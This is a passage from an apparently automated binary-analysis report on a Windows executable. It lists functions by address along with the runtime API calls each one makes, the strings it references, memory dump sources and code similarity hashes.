Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::remove.LIBCONCRT ref: 004A2CC8
Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 004A2CD7
__Mtx_unlock.LIBCPMT ref: 004A2CE5
GetCurrentThreadId.KERNEL32 ref: 004A2D19
__Mtx_unlock.LIBCPMT ref: 004A2D58

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::_Mtx_unlockToken$CancellationContainer::removeCounter::_CurrentRegistrationReleaseState::Threadmtx_do_lock
String ID:
API String ID: 1756149210-0
Opcode ID: 334a4b69a4a9a320fd037bf9ea47d541cdbf56bd862605b7949ee4052893e321
Instruction ID: d8347ce6bc4a61f6b58cc01ed327f8c676c6d0d4b21a7c094b74763dc4712300
Opcode Fuzzy Hash: 334a4b69a4a9a320fd037bf9ea47d541cdbf56bd862605b7949ee4052893e321
Instruction Fuzzy Hash: 5D2128728012159ADF21EFB88A42AEEB774BF16314F10452FE511A7182DFBC9B84D7C8

Uniqueness

Uniqueness Score: -1.00%

Function 00467857, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0046786F

Part of subcall function 00460DBA: HeapFree.KERNEL32(00000000,00000000,?,00467AF9,?,00000000,?,?,?,00467D9C,?,00000007,?,?,00468298,?), ref: 00460DD0
Part of subcall function 00460DBA: GetLastError.KERNEL32(?,?,00467AF9,?,00000000,?,?,?,00467D9C,?,00000007,?,?,00468298,?,?), ref: 00460DE2

_free.LIBCMT ref: 00467881
_free.LIBCMT ref: 00467893
_free.LIBCMT ref: 004678A5
_free.LIBCMT ref: 004678B7

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 23e3d8f20168529110facc2aab319b63d8534998dad9544af629a51d8a1678db
Instruction ID: 3616ce2971710be6689e0d42258072cc925a5da495c5fa9b6bd2c41685df3147
Opcode Fuzzy Hash: 23e3d8f20168529110facc2aab319b63d8534998dad9544af629a51d8a1678db
Instruction Fuzzy Hash: 64F04F72508300EB8660EBA9E58AC6B73DABA40724764081AF54CD7700EF28FC80C66E

Uniqueness

Uniqueness Score: -1.00%

Function 0044F380, Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(004FA47C,?,?,0042347D,004FC3FC,004B5290,?,?,?,?,?), ref: 0044F38A
LeaveCriticalSection.KERNEL32(004FA47C,?,0042347D,004FC3FC,004B5290,?,?,?,?,?), ref: 0044F3BD
RtlWakeAllConditionVariable.NTDLL ref: 0044F434
SetEvent.KERNEL32(?,004FC3FC,004B5290,?,?,?,?,?), ref: 0044F43E
ResetEvent.KERNEL32(?,004FC3FC,004B5290,?,?,?,?,?), ref: 0044F44A

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
String ID:
API String ID: 3916383385-0
Opcode ID: f6d8c8c42cebce3b34bc43e349e51f50009d5de0e181bcc97457917d42dec6f9
Instruction ID: 7f14f37617dc2f852e370cb855067b323ec80d48e8b378ec253acf4f0f276261
Opcode Fuzzy Hash: f6d8c8c42cebce3b34bc43e349e51f50009d5de0e181bcc97457917d42dec6f9
Instruction Fuzzy Hash: 290119B1A01160DFDB15AF28FC4C9A67BA4EB49711701417AFA4983321CF746C61DBAD

Uniqueness

Uniqueness Score: -1.00%

Function 004381E0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 249COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 004382AC
___std_exception_destroy.LIBVCRUNTIME ref: 00438379
___std_exception_destroy.LIBVCRUNTIME ref: 004383CA

Strings

~`|+, xrefs: 004381F4

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: ~`|+
API String ID: 1206660477-3443854377
Opcode ID: 2a43989f95742302d6c6e61860db9e2e671c37f35955d44081a17ef80c75c3b4
Instruction ID: 4f1a9670f7e63f46cb7172ffcf2b0637931ea97164e2a13dea46218b23a63b08
Opcode Fuzzy Hash: 2a43989f95742302d6c6e61860db9e2e671c37f35955d44081a17ef80c75c3b4
Instruction Fuzzy Hash: BFB13BB1E002189FCB04CF99D894AADFBB5FF48314F15816BE815AB341DB78A945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00438550, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 249COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0043861C
___std_exception_destroy.LIBVCRUNTIME ref: 004386E9
___std_exception_destroy.LIBVCRUNTIME ref: 0043873A

Strings

~`|+, xrefs: 00438564

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: ~`|+
API String ID: 1206660477-3443854377
Opcode ID: c747d6c8fbf743ebfcfcf1a2525eb36d97ca74d35e0b8d5c9c80c4bad8cfc940
Instruction ID: b5234b3e2c17266f1039502c6fe7dbf4657c8e2ed9659115a243dbba3bdbf362
Opcode Fuzzy Hash: c747d6c8fbf743ebfcfcf1a2525eb36d97ca74d35e0b8d5c9c80c4bad8cfc940
Instruction Fuzzy Hash: 8AB15DB5D002089FCB04DFA8D8946ADFBB5FF48318F14816BE815AB350DB78A905CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004661E8, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 225COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004663B1

Strings

~`|+, xrefs: 004661F0, 004664CF

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: ~`|+
API String ID: 269201875-3443854377
Opcode ID: dd97d88ef43868ba3238a0ffa280b8a82ec2f7571de9d73b2518f942d8fc42fb
Instruction ID: 9ac1b88f031ccb904f60e7d2fb7209b16df7eb5140bd797a5597c40c63658650
Opcode Fuzzy Hash: dd97d88ef43868ba3238a0ffa280b8a82ec2f7571de9d73b2518f942d8fc42fb
Instruction Fuzzy Hash: FE714B71E002199BCF14DFA9C8819AEB7F5FF48310B15416EE915E7340E738AD41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0042AF70, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0042AFDB

Strings

~`|+, xrefs: 0042AF9B

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectorySystem
String ID: ~`|+
API String ID: 2188284642-3443854377
Opcode ID: ba429103a701650ce441d7e079b4c9e204e062ecb318c9f4010a64e36ca834fa
Instruction ID: 5c179d2a2bd446049c6fed5b143ebeb06a9a14a94705730515eab511fdb37c37
Opcode Fuzzy Hash: ba429103a701650ce441d7e079b4c9e204e062ecb318c9f4010a64e36ca834fa
Instruction Fuzzy Hash: 5971FA70A002249FDB24DF24DD4DB9AB7B4FF44304F5046DEE40997291DB78AA84CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004226E0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 155memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0044EF42: EnterCriticalSection.KERNEL32(004FA428,?,00000018,?,0042274D,00000000,2B7C607E,?,?,?), ref: 0044EF4D
Part of subcall function 0044EF42: LeaveCriticalSection.KERNEL32(004FA428,?,0042274D,00000000,2B7C607E,?,?,?), ref: 0044EF79

FindResourceExW.KERNEL32(00000000,00000006,00000007,00000000,00000000,2B7C607E,?,?,?), ref: 0042275F
HeapFree.KERNEL32(?,00000000,-000000D8,?,?,?), ref: 004227CF
FindResourceW.KERNEL32(00000000,00000007,00000006,?), ref: 004227E3

Part of subcall function 00422D90: LoadResource.KERNEL32(?,?,?,?,?,?,004F1D4C,?,?,?), ref: 00422D99
Part of subcall function 00422D90: LockResource.KERNEL32(00000000,?,?,?,?,?,?,004F1D4C,?,?,?), ref: 00422DA4
Part of subcall function 00422D90: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,004F1D4C,?,?,?), ref: 00422DB2

Strings

~`|+, xrefs: 004226F4

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$CriticalFindSection$EnterFreeHeapLeaveLoadLockSizeof
String ID: ~`|+
API String ID: 840036528-3443854377
Opcode ID: 63b9000b865ba7db3f98dc4824453451dc39330c7d4a8287babae19905884862
Instruction ID: c07f68db988bab421abee90d8a5783db3fbbaff0cb26d8910aa7f03b1db55b05
Opcode Fuzzy Hash: 63b9000b865ba7db3f98dc4824453451dc39330c7d4a8287babae19905884862
Instruction Fuzzy Hash: 7E512331B00121ABD724AB65ED81B3BB7E5EF84310F54422FEA1697391DB78DC01CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0046474F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 149COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00464864

Part of subcall function 00464670: __freea.LIBCMT ref: 00464725

_free.LIBCMT ref: 004647BA

Part of subcall function 00460DBA: HeapFree.KERNEL32(00000000,00000000,?,00467AF9,?,00000000,?,?,?,00467D9C,?,00000007,?,?,00468298,?), ref: 00460DD0
Part of subcall function 00460DBA: GetLastError.KERNEL32(?,?,00467AF9,?,00000000,?,?,?,00467D9C,?,00000007,?,?,00468298,?,?), ref: 00460DE2

GetLastError.KERNEL32(?,?,00000000,?,00000000), ref: 004647F5

Part of subcall function 004626C2: RtlAllocateHeap.NTDLL(00000008,00000010,00000000,?,00460CFB,00000001,00000364,00000002,000000FF,?,00459A98,00495F09,004F5494,?,004844C1,?), ref: 00462703

Strings

~`|+, xrefs: 0046475A

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHeapLast_free$AllocateFree__freea
String ID: ~`|+
API String ID: 2880554715-3443854377
Opcode ID: 29a234825a40b775b5d41d1f7cca2fc9fb2759abcf33811ad13da2b21d493b70
Instruction ID: bc2697ab729d647e18291aaec213c7c00f1a43fcbf3d7b112740ca980f2155ee
Opcode Fuzzy Hash: 29a234825a40b775b5d41d1f7cca2fc9fb2759abcf33811ad13da2b21d493b70
Instruction Fuzzy Hash: 5441B575900265ABDF21AF66DC41B9B76B9BF86310F10449AF904D3241FB39CE409B7A

Uniqueness

Uniqueness Score: -1.00%

Function 00449180, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 137COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 004492B2

Strings

CryptoMaterial: this object does not support precomputation, xrefs: 00449235
CryptoMaterial: this object contains invalid values, xrefs: 004491D7
~`|+, xrefs: 00449196, 00449224, 00449284

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ___std_exception_copy
String ID: CryptoMaterial: this object contains invalid values$CryptoMaterial: this object does not support precomputation$~`|+
API String ID: 2659868963-2927059771
Opcode ID: 5e398b4675884fd0dc5579d664d33c1517e4b71cdf0a291667523d25a8cf2dd4
Instruction ID: 3b72e71185a14ac99306c7576519255457bb79fdc89b0b7d2a1f46aeea95709b
Opcode Fuzzy Hash: 5e398b4675884fd0dc5579d664d33c1517e4b71cdf0a291667523d25a8cf2dd4
Instruction Fuzzy Hash: 5F416075900608ABCB00DF55D941FDAB7FCEB59710F10866BE911A3780EB79AA14CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0043A14A, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 109COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000,02713E1C,?), ref: 0043A3EE

Strings

, xrefs: 0043A151
!!!, xrefs: 0043A15A
, Errorcode=, xrefs: 0043A1B6

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Event
String ID: $!!!$, Errorcode=
API String ID: 4201588131-3262039349
Opcode ID: 6e60002b8be57775e0c01b06acd64673444eabc36696ba5e62638f800aecb11a
Instruction ID: fcb3259761953d7408456936b450309aa17a97c5150829a9629e1249059be594
Opcode Fuzzy Hash: 6e60002b8be57775e0c01b06acd64673444eabc36696ba5e62638f800aecb11a
Instruction Fuzzy Hash: 3D41B430A40249DBDF15EF65D851BEEB3A0BF28304F50416FE446A7291DB3C9A19CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004374F0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(?,?,?,?,2B7C607E,?,?,?,?,?,004AF058,000000FF,?,0043EFCB,004FC4F0,?), ref: 00437524
CloseHandle.KERNEL32(00000000,?,?,?,?,004AF058,000000FF,?,0043EFCB,004FC4F0,?,?,00439EED), ref: 0043753F
___std_exception_destroy.LIBVCRUNTIME ref: 004375B8

Strings

~`|+, xrefs: 00437505, 00437594

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateEventHandle___std_exception_destroy
String ID: ~`|+
API String ID: 2850769370-3443854377
Opcode ID: 63e5b56b85702abf8c9b52028afef51185752b4000525f9a85fbd70a5bd82718
Instruction ID: 21bf00f8c6156bdd357c1b7637019b4e14d2893edcef072fbdb4fb6a9d4c9526
Opcode Fuzzy Hash: 63e5b56b85702abf8c9b52028afef51185752b4000525f9a85fbd70a5bd82718
Instruction Fuzzy Hash: 1331C4B2A08609AFC714CF58D840B6AB7F8EB49714F10826FED15D7B40DB39A904CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0045857A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

UnDecorator::getSignedDimension.LIBCMT ref: 004585CB

Strings

~`|+, xrefs: 00458580

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Decorator::getDimensionSigned
String ID: ~`|+
API String ID: 2996861206-3443854377
Opcode ID: 0db9f02ba33a0af7fb6ddc84badf65128f4f52b2c8d6c527f34d979ef6847bfa
Instruction ID: ad90912dfe0901bd3f64640b24653f2b12755cff5327c437c04be5d90cf4bc04
Opcode Fuzzy Hash: 0db9f02ba33a0af7fb6ddc84badf65128f4f52b2c8d6c527f34d979ef6847bfa
Instruction Fuzzy Hash: A73143B1D041089ADB04EBA5D855BFEB7F8AB08306F10402FE901B2182DF7C5A19CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004A4650, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

List.LIBCONCRT ref: 004A46D5
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004A46FA
Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 004A473B

Strings

pExecutionResource, xrefs: 004A46F2

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
String ID: pExecutionResource
API String ID: 1772865662-359481074
Opcode ID: c8bee0fe8c8248b6a86ec73614a0d62c22c160547bfad0b7556ffd438c7868c6
Instruction ID: 5f267d5c2e5728b2c08f9dc21957c01e2e590fe6f7428a2cada8aaf3ce4c65ca
Opcode Fuzzy Hash: c8bee0fe8c8248b6a86ec73614a0d62c22c160547bfad0b7556ffd438c7868c6
Instruction Fuzzy Hash: 1221D775600205ABDF08EF65C851BAD77B5BF84314F10402FE6016B382DBBCAE05CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0044E48F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

InitOnceExecuteOnce.KERNELBASE(?,4B,0044D2E0,4B), ref: 0044E4B1
SetLastError.KERNEL32(0000000D,?,?,4B,0044D2E0,4B,004FCA1C,004205C3,00000000,?,004205C3,004FCA1C,004234E0,?), ref: 0044E50F

Strings

4B, xrefs: 0044E48F

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Once$ErrorExecuteInitLast
String ID: 4B
API String ID: 3407056439-3351857111
Opcode ID: a45f997650df8cc3480e1efbae4dbeb97448c567e02434a3ab284f7480c5900f
Instruction ID: c3b57ed9f1108df408cdda60acc80609930da42ece0750ab381b1aa2a04cacd7
Opcode Fuzzy Hash: a45f997650df8cc3480e1efbae4dbeb97448c567e02434a3ab284f7480c5900f
Instruction Fuzzy Hash: CC11E132300125AFEF225F6ADC485AFB765FF08754B00843AFA0586310D6308C109BD5

Uniqueness

Uniqueness Score: -1.00%

Function 0049CB89, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::Cleanup.LIBCONCRT ref: 0049CBE2
~ListArray.LIBCONCRT ref: 0049CC24
~ListArray.LIBCONCRT ref: 0049CC2C

Strings

~`|+, xrefs: 0049CBC9

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ArrayList$Base::CleanupConcurrency::details::Scheduler
String ID: ~`|+
API String ID: 3569316350-3443854377
Opcode ID: 8fd1d4fd2cfd086ee2f6c726f3b0b8e483f6792256648dff39ec6a508e468e46
Instruction ID: 971ec173bfc6be9124bd96b97dd5a9770b17f861db4f67c524c1d2c24619251b
Opcode Fuzzy Hash: 8fd1d4fd2cfd086ee2f6c726f3b0b8e483f6792256648dff39ec6a508e468e46
Instruction Fuzzy Hash: 38114231500901AFCB49FB66D892AD9F760FF51718F10413FE42656A91DF397A19CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0049CBA9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::Cleanup.LIBCONCRT ref: 0049CBE2

Part of subcall function 0049D537: Concurrency::details::SchedulingNode::~SchedulingNode.LIBCONCRT ref: 0049D551
Part of subcall function 0049D537: Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 0049FA7F
Part of subcall function 0049D537: Concurrency::details::_UnregisterConcRTEventTracing.LIBCONCRT ref: 0049FA91
Part of subcall function 0049D537: InterlockedPopEntrySList.KERNEL32(004FC358,00000004,004AE020,000000FF), ref: 0049FAA7

Part of subcall function 00497345: DeleteCriticalSection.KERNEL32(?,004A53D5,2B7C607E,00000000,?,?,00000000,004AE3B0,000000FF,?,00498788), ref: 00497346

~ListArray.LIBCONCRT ref: 0049CC24

